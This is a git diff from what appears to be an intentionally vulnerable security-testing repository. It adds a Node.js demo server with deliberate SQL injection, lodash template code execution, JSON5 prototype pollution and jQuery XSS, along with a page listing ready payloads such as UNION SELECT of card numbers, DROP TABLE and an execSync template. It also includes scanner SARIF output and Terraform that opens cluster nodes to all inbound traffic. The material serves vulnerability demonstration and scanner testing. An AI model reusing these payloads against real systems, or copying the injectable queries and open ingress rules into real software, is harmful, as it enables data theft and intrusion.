    Processed version range. Time taken: ${timeTaken}ms.

    `); - } catch (error) { - const end = Date.now(); - const timeTaken = end - start; - console.error(error); - responseMessages.push(`

    An error occurred while processing the version range: ${error.message}. Time taken: ${timeTaken}ms

    `); + try { + // Collect all async operations into an array of promises + let asyncTasks = []; + + // Direct SQL Injection via Sequelize + if (postData.orderNumber) { + const index = responseMessages.length; + responseMessages.push(`

    1. Sequelize Injection

    `); // Add header immediately + asyncTasks.push( + (async () => { + try { + const query = `SELECT product FROM Orders WHERE orderNumber = ${postData.orderNumber};`; + const result = await sequelize.query(query, { type: sequelize.QueryTypes.SELECT }); + responseMessages[index] += result.length > 0 + ? `

    Order details: 

    ${JSON.stringify(result, null, 2)}

    ` + : `

    No orders found for order number ${postData.orderNumber}

    `; + } catch (error) { + responseMessages[index] += `

    Sequelize query error: ${error.message}

    `; + } + })() + ); } - } - // CVE-2022-46175 Prototype Polution from JSON5 showing phantom package - if (postData.json5data) { - try { - // Parse the JSON5 data, which may include prototype pollution - const parsedObject = JSON5.parse(postData.json5data); - - // Create a new object that inherits from the parsedObject - // This step is crucial to demonstrate the prototype pollution, as it will inherit any polluted properties - const testObject = Object.create(parsedObject); - - // Now, check if the prototype pollution has been successful by checking the new object - if (testObject.polluted) { - responseMessages.push(`

    Prototype pollution detected: testObject.polluted = ${testObject.polluted}

    `); - } else { - responseMessages.push(`

    No prototype pollution detected.

    `); - } - } catch (error) { - console.error(error); - responseMessages.push(`

    An error occurred while processing the JSON5 data: ${error.message}

    `); + // Direct SQL Injection via sqlite3 + if (postData.orderNumber2) { + const index = responseMessages.length; + responseMessages.push(`

    2. SQLite Injection

    `); // Add header immediately + asyncTasks.push( + new Promise((resolve) => { + const query = `SELECT product FROM Orders WHERE orderNumber = ${postData.orderNumber2};`; + db.all(query, [], (err, rows) => { + if (err) { + responseMessages[index] += `

    SQLite error: ${err.message}

    `; + } else { + responseMessages[index] += rows.length > 0 + ? `

    Order details: 

    ${JSON.stringify(rows, null, 2)}

    ` + : `

    No orders found for order number ${postData.orderNumber2}

    `; + } + resolve(); + }); + }) + ); + } + + // Sequelize FindAll Injection + if (postData.username) { + const index = responseMessages.length; + responseMessages.push(`

    3. Sequelize FindAll Injection

    `); // Add header immediately + asyncTasks.push( + (async () => { + try { + const users = await User.findAll({ + where: sequelize.literal(`username = "${postData.username}"`), + }); + responseMessages[index] += users.length > 0 + ? `

    Users found:

      ${users + .map((user) => `
    • Username: ${user.username}, Email: ${user.email}
      • `) + .join('')}

    ` + : `

    No users found

    `; + } catch (error) { + responseMessages[index] += `

    Sequelize findAll error: ${error.message}

    `; + } + })() + ); } - } - // Send combined response - res.writeHead(200, { 'Content-Type': 'text/html' }); - res.end(responseMessages.join('') + `Go back`); + // Lodash Template Vulnerability + if (postData.template) { + const index = responseMessages.length; + responseMessages.push(`

    4. Lodash Template Vulnerability

    `); // Add header immediately + asyncTasks.push( + (async () => { + try { + const compiled = _.template(postData.template); + const output = compiled({}); + console.log("Lodash Template output:", output); + responseMessages[index] += `

    Template executed successfully. Output logged on the server.

    `; + } catch (error) { + responseMessages[index] += `

    Lodash template error: ${error.message}

    `; + } + })() + ); + } + + // Prototype Pollution via JSON5 + if (postData.json5data) { + const index = responseMessages.length; + responseMessages.push(`

    5. JSON5 Prototype Pollution

    `); + asyncTasks.push( + (async () => { + try { + const parsedObject = JSON5.parse(postData.json5data); + if (parsedObject.polluted === "Prototype pollution successful!") { + responseMessages[index] += `

    Prototype pollution detected!

    `; + } else { + responseMessages[index] += `

    No prototype pollution detected

    `; + } + } catch (error) { + responseMessages[index] += `

    JSON5 parsing error: ${error.message}

    `; + } + })() + ); + } + + // jQuery XSS Vulnerability + if (postData.jqueryUrl) { + const index = responseMessages.length; + responseMessages.push(`

    6. jQuery XSS Vulnerability

    `); // Add header immediately + asyncTasks.push( + (async () => { + const jqueryCode = ``; + responseMessages[index] += `

    jQuery was loaded from user-provided URL:

    ${jqueryCode}
    `; + })() + ); + } + + // Wait for all async tasks to complete + await Promise.all(asyncTasks); + + // Send combined response + res.writeHead(200, { 'Content-Type': 'text/html' }); + res.end(responseMessages.join('') + `

    Go back

    `); + } catch (error) { + res.writeHead(500, { 'Content-Type': 'text/plain' }); + res.end('An unexpected error occurred.'); + console.error(error); + } }); } else if (req.method === 'GET') { res.writeHead(200, { 'Content-Type': 'text/html' }); res.end(` + + + -

    Lodash Template and Semver Range Vulnerability Demo

    -
    +

    Package Vulnerability Demo

    + +
    -
    -
    +

    2. Sequelize Injection

    + + + Try payloads: +
      +
    • 1001 UNION SELECT creditCardNumber FROM Orders --
      • +
    • 1001; DROP TABLE Orders; --
      • +
    +
    +
    -
    -
    +

    3. MySQL Injection

    + + + Try payloads: +
      +
    • 1001 UNION SELECT creditCardNumber FROM Orders --
      • +
    • 1001; DROP TABLE Orders; --
      • +
    +
    +
    -
    - + Try payload: <%= global.process.mainModule.require('child_process').execSync('ls -la') %> +
    + + +
    +

    6. Semver ReDoS Vulnerability (CVE-2022-25883)

    + + + Try payload: ^((((((((((((((((((a)?){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2})*$ +
    + + +
    +

    7. JSON5 Prototype Pollution (CVE-2022-46175)

    + + + Try payload: { "__proto__": { "polluted": "Prototype pollution successful!" } } +
    + + +
    +

    8. jQuery XSS Vulnerability (CVE-2015-9251)

    + + + Try payload: http://sakurity.com/jqueryxss
    -

    Submit to execute the vulnerable lodash template function or to validate a version range with semver on the server.

    +

    Submit to test various package vulnerabilities on the server.

    `); } }); -server.listen(port, hostname, () => { +server.listen(port, hostname, async () => { + await sequelize.sync(); console.log(`Server running at http://${hostname}:${port}/`); }); diff --git a/insecure-js/snyk.sarif b/insecure-js/snyk.sarif new file mode 100644 index 0000000..96c3c17 --- /dev/null +++ b/insecure-js/snyk.sarif @@ -0,0 +1,488 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "SnykCode", + "semanticVersion": "1.0.0", + "version": "1.0.0", + "rules": [ + { + "id": "javascript/HttpToHttps", + "name": "HttpToHttps", + "shortDescription": { + "text": "Cleartext Transmission of Sensitive Information" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "\n## Details\nThis weakness occurs when software transmits sensitive information, such as passwords or credit card numbers, in unencrypted form. This information may then be intercepted by threat actors using sniffer tools or interception techniques such as man-in-the-middle (MITM) attacks (often involving social engineering). Attackers can then use information gleaned to perform a variety of actions, depending on the information type. Possible actions include gaining unauthorized access, impersonating a user, moving laterally within the organization's network, or retrieving and potentially modifying files. This weakness is almost completely avoidable through intelligent architecture and design.\n\n## Best practices for prevention\n* Build web applications around a security mindset and the awareness that sniffers may be present at any time.\n* Ensure that all sensitive data transmission uses reliable encryption.\n* Implement security measures so that sensitive results are never returned in plain text.\n* Implement multiple-factor authentication methods to validate remote instances.\n* Use SSL not only at logon but throughout communications.", + "text": "" + }, + "properties": { + "tags": [ + "javascript", + "HttpToHttps", + "Security" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/eserozvataf/apibone/commit/bbac9343971a20f4fee124b6f0a2f6a80895fb35?diff=split#diff-8b733ca241b0609b1fc0f2e60d14f911b3a82997a939e7eb01fe6c25b759c234L-1", + "lines": [ + { + "line": "const http = require('http'),\n", + "lineNumber": 0, + "lineChange": "removed" + }, + { + "line": "const https = require('https'),\n", + "lineNumber": 0, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/RetireJS/retire.js/commit/82d44d60c98acba0e4c3772709e76b989c4274bb?diff=split#diff-89d400752fb89d946a43778e9f0b3dba25968dcdf8604ae08adbb3ecb236338fL-1", + "lines": [ + { + "line": "var http = require('http'),\n", + "lineNumber": 1, + "lineChange": "removed" + }, + { + "line": "var http = require('https'),\n", + "lineNumber": 1, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/Rich-Harris/packd/commit/c14d17da80ed075ee007de3121422fb2c5b77e4d?diff=split#diff-1821d11fbffbab2187701c42616688d46bf66d7b2cf6eaf363548dd66caa6ebaL-1", + "lines": [ + { + "line": "const http = require( 'http' );\n", + "lineNumber": 0, + "lineChange": "removed" + }, + { + "line": "const https = require( 'https' );\n", + "lineNumber": 0, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 1, + "lineChange": "none" + }, + { + "line": "module.exports = function get ( url ) {\n", + "lineNumber": 2, + "lineChange": "none" + }, + { + "line": "\treturn new Promise( ( fulfil, reject ) => {\n", + "lineNumber": 3, + "lineChange": "none" + }, + { + "line": "\t\thttp.get( url, response => {\n", + "lineNumber": 4, + "lineChange": "removed" + }, + { + "line": "\t\thttps.get( url, response => {\n", + "lineNumber": 4, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 122, + "cwe": [ + "CWE-319" + ] + } + }, + { + "id": "javascript/XSS", + "name": "XSS", + "shortDescription": { + "text": "Cross-site Scripting (XSS)" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser's Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they've been correctly escaped in the application code and in this way the attempted attack is diverted.\n\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.\n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user's browser.|\n|**DOM-based**|Client|The attacker forces the user's browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## Best practices for prevention\nThis section describes the top best practices designed to specifically protect your code:\n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents.\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.", + "text": "" + }, + "properties": { + "tags": [ + "javascript", + "XSS", + "Security", + "SourceResourceAccess", + "SourceStackTrace", + "Taint" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/mockyeah/mockyeah/commit/24e0243bfde18396637ba0bfca681c2cf2d2be33?diff=split#diff-8fef0ae737443178f9c7da5682af7782959b12df701f054731a31e4238049341L-1", + "lines": [ + { + "line": "mockyeah.post('/', (req, res) => {\n", + "lineNumber": 4, + "lineChange": "removed" + }, + { + "line": " res.send(req.body.hey);\n", + "lineNumber": 5, + "lineChange": "removed" + }, + { + "line": "mockyeah.post('/', {\n", + "lineNumber": 4, + "lineChange": "added" + }, + { + "line": " text: req => req.body.hey\n", + "lineNumber": 5, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/spmjs/spmjs.io/commit/7ef27fc5ab515b9b7b2ed55b5797d87f78c027e4?diff=split#diff-494245839b096ba21695a9461e8c619198001b9ecd9d129c5c9af193ae9d67fbL-1", + "lines": [ + { + "line": "res.set('Content-Type', 'application/json');\n", + "lineNumber": 18, + "lineChange": "added" + }, + { + "line": "res.send(JSON.stringify(p));\n", + "lineNumber": 19, + "lineChange": "none" + } + ] + }, + { + "commitURL": "https://github.com/MROS/infinite-city/commit/e44f362054f1d95d6e266d6448cc333b5564c87d?diff=split#diff-2fe53c2b142a276b20739b3145462cc926666764b0a5b4fcd1605be1d316e4d2L-1", + "lines": [ + { + "line": "res.status(400).send(err.message);\n", + "lineNumber": 18, + "lineChange": "removed" + }, + { + "line": "res.status(400).send(\"FAIL\");\n", + "lineNumber": 19, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 141, + "cwe": [ + "CWE-79" + ] + } + } + ] + } + }, + "results": [ + { + "ruleId": "javascript/HttpToHttps", + "ruleIndex": 0, + "level": "warning", + "message": { + "text": "http.createServer uses HTTP which is an insecure protocol and should not be used in code due to cleartext transmission of information. Data in cleartext in a communication channel can be sniffed by unauthorized actors. Consider using the https module instead.", + "markdown": "{0} uses HTTP which is an insecure protocol and should not be used in code due to cleartext transmission of information. Data in cleartext in a communication channel can be sniffed by unauthorized actors. Consider using the https module instead.", + "arguments": [ + "[http.createServer](0)" + ] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 11, + "endLine": 11, + "startColumn": 16, + "endColumn": 33 + } + } + } + ], + "fingerprints": { + "0": "ca235390a9d673005bd9fb167280e313610ecef4f098925fc2eef35ba507d4b4", + "1": "ae77ea27.883ce888.8b18f948.c559ebce.2fce9a75.5fce695c.cd61fc56.89d75565.7a85a498.4773f344.8b18f948.c559ebce.6432a006.5fce695c.cd61fc56.89d75565" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 11, + "endLine": 11, + "startColumn": 16, + "endColumn": 33 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 600, + "priorityScoreFactors": [ + { + "label": true, + "type": "hotFileSource" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + }, + { + "ruleId": "javascript/XSS", + "ruleIndex": 1, + "level": "warning", + "message": { + "text": "Unsanitized input from an exception flows into end, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).", + "markdown": "Unsanitized input from {0} {1} into {2}, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).", + "arguments": [ + "[an exception](0)", + "[flows](1),(2),(3),(4),(5),(6)", + "[end](7)" + ] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 162, + "endLine": 162, + "startColumn": 11, + "endColumn": 14 + } + } + } + ], + "fingerprints": { + "0": "af6d3175573afd798920894c02ee5ba2d865564426c720aee852a7bc1bd889ed", + "1": "bc441d81.4773f344.607187b5.f952b2fa.ef9f7d82.756a1932.cd61fc56.9b5cefb9.51bd987d.70dd3b3b.c9330245.d3185418.5bcab2b0.fa319843.3e0616cf.e6930396" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 63, + "endLine": 63, + "startColumn": 64, + "endColumn": 71 + } + } + } + }, + { + "location": { + "id": 1, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 63, + "endLine": 63, + "startColumn": 64, + "endColumn": 71 + } + } + } + }, + { + "location": { + "id": 2, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 63, + "endLine": 63, + "startColumn": 11, + "endColumn": 27 + } + } + } + }, + { + "location": { + "id": 3, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 96, + "endLine": 96, + "startColumn": 11, + "endColumn": 27 + } + } + } + }, + { + "location": { + "id": 4, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 162, + "endLine": 162, + "startColumn": 15, + "endColumn": 31 + } + } + } + }, + { + "location": { + "id": 5, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 162, + "endLine": 162, + "startColumn": 32, + "endColumn": 36 + } + } + } + }, + { + "location": { + "id": 6, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 162, + "endLine": 162, + "startColumn": 15, + "endColumn": 75 + } + } + } + }, + { + "location": { + "id": 7, + "physicalLocation": { + "artifactLocation": { + "uri": "server.js", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 162, + "endLine": 162, + "startColumn": 11, + "endColumn": 14 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 600, + "priorityScoreFactors": [ + { + "label": true, + "type": "hotFileSource" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + } + ], + "properties": { + "coverage": [ + { + "isSupported": true, + "lang": "JavaScript", + "files": 1, + "type": "SUPPORTED" + } + ] + } + } + ] +} diff --git a/insecure-js/styles.css b/insecure-js/styles.css new file mode 100644 index 0000000..fd2fdac --- /dev/null +++ b/insecure-js/styles.css @@ -0,0 +1,166 @@ +/* Modern Elegant Theme */ +@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap'); + +:root { + --primary: #6366f1; + --secondary: #4f46e5; + --accent: #818cf8; + --bg: #f8fafc; + --text: #1e293b; + --border: #e2e8f0; + --shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.1); +} + +body { + background-color: var(--bg); + color: var(--text); + font-family: 'Inter', sans-serif; + line-height: 1.6; + margin: 0; + padding: 20px; +} + +.container { + max-width: 800px; + margin: 0 auto; + background-color: #ffffff; + padding: 2rem; + border-radius: 12px; + box-shadow: var(--shadow); +} + +h1 { + color: var(--primary); + text-align: center; + font-weight: 600; + margin-bottom: 2rem; + font-size: 2rem; +} + +.vulnerability-section { + background-color: #ffffff; + border: 1px solid var(--border); + border-radius: 8px; + padding: 1.5rem; + margin-bottom: 1.5rem; + transition: all 0.2s ease; +} + +.vulnerability-section:hover { + box-shadow: var(--shadow); + transform: translateY(-2px); +} + +h2 { + color: var(--secondary); + margin-top: 0; + font-weight: 600; + font-size: 1.5rem; + margin-bottom: 1rem; +} + +input[type="text"], +input[type="file"], +textarea { + background-color: #ffffff; + border: 1px solid var(--border); + color: var(--text); + padding: 0.75rem; + width: 100%; + margin: 0.5rem 0; + border-radius: 6px; + font-family: 'Inter', sans-serif; + font-size: 0.875rem; + transition: border-color 0.2s ease; +} + +input[type="text"]:focus, +input[type="file"]:focus, +textarea:focus { + outline: none; + border-color: var(--accent); + box-shadow: 0 0 0 3px rgba(99, 102, 241, 0.1); +} + +input[type="submit"] { + background-color: var(--primary); + color: #ffffff; + border: none; + padding: 0.75rem 1.5rem; + border-radius: 6px; + cursor: pointer; + transition: all 0.2s ease; + font-family: 'Inter', sans-serif; + font-weight: 600; + font-size: 0.875rem; +} + +input[type="submit"]:hover { + background-color: var(--secondary); + transform: translateY(-1px); +} + +code { + background-color: #f1f5f9; + padding: 0.2rem 0.4rem; + border-radius: 4px; + color: var(--secondary); + font-family: ui-monospace, monospace; + font-size: 0.875rem; +} + +pre { + background-color: #f8fafc; + border: 1px solid var(--border); + border-radius: 6px; + padding: 1rem; + overflow-x: auto; + margin: 1rem 0; + font-family: ui-monospace, monospace; + font-size: 0.875rem; +} + +a { + color: var(--primary); + text-decoration: none; + transition: color 0.2s ease; + font-weight: 500; +} + +a:hover { + color: var(--secondary); + text-decoration: underline; +} + +/* Simple loading state */ +.loading { + opacity: 0.7; + pointer-events: none; +} + +/* Form labels */ +label { + display: block; + margin-bottom: 0.5rem; + font-weight: 500; + color: var(--text); +} + +/* Small helper text */ +small { + display: block; + color: #64748b; + margin-top: 0.5rem; + font-size: 0.75rem; +} + +/* List styling */ +ul { + padding-left: 1.5rem; + margin: 0.5rem 0; +} + +li { + margin-bottom: 0.25rem; +} + \ No newline at end of file diff --git a/java-sec-code b/java-sec-code deleted file mode 160000 index 457d703..0000000 --- a/java-sec-code +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 457d703e8f89bff657c6c51151ada71ebd09a1c6 diff --git a/terraform/ingress-nginx-values.yaml b/terraform/ingress-nginx-values.yaml new file mode 100644 index 0000000..6867a7a --- /dev/null +++ b/terraform/ingress-nginx-values.yaml @@ -0,0 +1,19 @@ +controller: + ingressClassResource: + name: nginx + default: true + service: + annotations: + service.beta.kubernetes.io/aws-load-balancer-type: "nlb" + service.beta.kubernetes.io/aws-load-balancer-backend-protocol: "http" + service.beta.kubernetes.io/aws-load-balancer-scheme: "internet-facing" + service.beta.kubernetes.io/aws-load-balancer-nlb-target-type: "ip" + service.beta.kubernetes.io/aws-load-balancer-cross-zone-load-balancing-enabled: "true" + service.beta.kubernetes.io/aws-load-balancer-healthcheck-path: "/" + service.beta.kubernetes.io/aws-load-balancer-healthcheck-port: "80" + service.beta.kubernetes.io/aws-load-balancer-security-groups: "${security_group_id}" + type: LoadBalancer + externalTrafficPolicy: Cluster + config: + use-forwarded-headers: "true" + use-proxy-protocol: "false" \ No newline at end of file diff --git a/terraform/main.tf b/terraform/main.tf index 5e6b77f..7026a6e 100644 --- a/terraform/main.tf +++ b/terraform/main.tf @@ -13,6 +13,13 @@ data "aws_availability_zones" "available" { locals { cluster_name = "securitytesting-${random_string.suffix.result}" + + # Common tags for all resources + common_tags = { + Environment = "security-testing" + Terraform = "true" + Project = "insecure-kubernetes-deployments" + } } resource "random_string" "suffix" { @@ -45,6 +52,8 @@ module "vpc" { "kubernetes.io/cluster/${local.cluster_name}" = "shared" "kubernetes.io/role/internal-elb" = 1 } + + tags = local.common_tags } module "eks" { @@ -52,40 +61,68 @@ module "eks" { version = "20.2.1" cluster_name = local.cluster_name - cluster_version = "1.28" + cluster_version = "1.32" vpc_id = module.vpc.vpc_id subnet_ids = module.vpc.private_subnets - cluster_endpoint_public_access = true + cluster_endpoint_public_access = true # Enable public access for Terraform management + + # Add security group configuration for nodes + node_security_group_additional_rules = { + ingress_self_all = { + description = "Node to node all ports/protocols" + protocol = "-1" + from_port = 0 + to_port = 0 + type = "ingress" + self = true + } + # Allow inbound traffic from allowed IP for testing + ingress_allowed_ip = { + description = "Allow inbound traffic from allowed IP for testing" + protocol = "-1" + from_port = 0 + to_port = 0 + type = "ingress" + cidr_blocks = ["0.0.0.0/0"] + } + egress_all = { + description = "Node all egress" + protocol = "-1" + from_port = 0 + to_port = 0 + type = "egress" + cidr_blocks = ["0.0.0.0/0"] + } + } eks_managed_node_group_defaults = { ami_type = "AL2_x86_64" - } eks_managed_node_groups = { - one = { - name = "node-group-1" - - instance_types = ["t3.medium"] - + main = { + name = "main-node-group" + instance_types = ["t3.xlarge"] min_size = 1 - max_size = 3 - desired_size = 1 - } - - two = { - name = "node-group-2" - - instance_types = ["t3.medium"] + max_size = 6 + desired_size = 3 - min_size = 1 - max_size = 2 - desired_size = 1 + # Add these configurations for faster termination + force_update_version = true + force_delete = true + + # Reduce the time pods have to gracefully terminate + timeouts = { + create = "30m" + update = "30m" + delete = "15m" + } } } -} + tags = local.common_tags +} # https://aws.amazon.com/blogs/containers/amazon-ebs-csi-driver-is-now-generally-available-in-amazon-eks-add-ons/ data "aws_iam_policy" "ebs_csi_policy" { @@ -101,6 +138,8 @@ module "irsa-ebs-csi" { provider_url = module.eks.oidc_provider role_policy_arns = [data.aws_iam_policy.ebs_csi_policy.arn] oidc_fully_qualified_subjects = ["system:serviceaccount:kube-system:ebs-csi-controller-sa"] + + tags = local.common_tags } resource "aws_eks_addon" "ebs-csi" { @@ -108,8 +147,133 @@ resource "aws_eks_addon" "ebs-csi" { addon_name = "aws-ebs-csi-driver" addon_version = "v1.20.0-eksbuild.1" service_account_role_arn = module.irsa-ebs-csi.iam_role_arn - tags = { - "eks_addon" = "ebs-csi" - "terraform" = "true" + tags = local.common_tags +} + +# Create IAM role for AWS Load Balancer Controller +module "lb_role" { + source = "terraform-aws-modules/iam/aws//modules/iam-role-for-service-accounts-eks" + + role_name = "aws-load-balancer-controller" + attach_load_balancer_controller_policy = true + + oidc_providers = { + main = { + provider_arn = module.eks.oidc_provider_arn + namespace_service_accounts = ["kube-system:aws-load-balancer-controller"] + } + } + + tags = local.common_tags +} + +# Install AWS Load Balancer Controller +resource "helm_release" "aws_load_balancer_controller" { + name = "aws-load-balancer-controller" + repository = "https://aws.github.io/eks-charts" + chart = "aws-load-balancer-controller" + version = "1.7.1" # Pin the version + namespace = "kube-system" + + set { + name = "clusterName" + value = module.eks.cluster_name + } + + set { + name = "serviceAccount.create" + value = "true" + } + + set { + name = "serviceAccount.annotations.eks\\.amazonaws\\.com/role-arn" + value = module.lb_role.iam_role_arn + } + + atomic = true + cleanup_on_fail = true + timeout = 300 + + depends_on = [module.eks] +} + +# Add a time_sleep to wait for LB creation +resource "time_sleep" "wait_for_lb" { + create_duration = "30s" + triggers = { + # This will change whenever the helm release changes + helm_id = helm_release.aws_load_balancer_controller.id + } + depends_on = [ + helm_release.aws_load_balancer_controller + ] +} + +# Create security group for ingress-nginx load balancer +resource "aws_security_group" "ingress_nginx" { + name = "ingress-nginx-lb" + description = "Security group for ingress-nginx load balancer" + vpc_id = module.vpc.vpc_id + + ingress { + from_port = 80 + to_port = 80 + protocol = "tcp" + cidr_blocks = [var.allowed_ip] + } + + ingress { + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = [var.allowed_ip] + } + + # Allow health check traffic from AWS load balancer IPs + ingress { + from_port = 10254 + to_port = 10254 + protocol = "tcp" + cidr_blocks = ["0.0.0.0/0"] # AWS load balancer health checks come from AWS IPs + } + + egress { + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] } + + tags = merge(local.common_tags, { + Name = "ingress-nginx-lb" + }) +} + +# Install ingress-nginx using Helm +resource "helm_release" "ingress_nginx" { + name = "ingress-nginx" + repository = "https://kubernetes.github.io/ingress-nginx" + chart = "ingress-nginx" + version = "4.9.0" # Pin the version + namespace = "ingress-nginx" + create_namespace = true + + values = [ + templatefile("${path.module}/ingress-nginx-values.yaml", { + cluster_name = module.eks.cluster_name + allowed_ip = var.allowed_ip + security_group_id = aws_security_group.ingress_nginx.id + }) + ] + + atomic = true + cleanup_on_fail = true + timeout = 300 + + depends_on = [ + module.eks, + helm_release.aws_load_balancer_controller, + time_sleep.wait_for_lb, + aws_security_group.ingress_nginx + ] } \ No newline at end of file diff --git a/terraform/semgrep.sarif b/terraform/semgrep.sarif new file mode 100644 index 0000000..ff4c720 --- /dev/null +++ b/terraform/semgrep.sarif @@ -0,0 +1 @@ +{"version":"2.1.0","runs":[{"invocations":[{"executionSuccessful":true,"toolExecutionNotifications":[]}],"results":[],"tool":{"driver":{"name":"Semgrep OSS","rules":[{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","id":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","name":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep 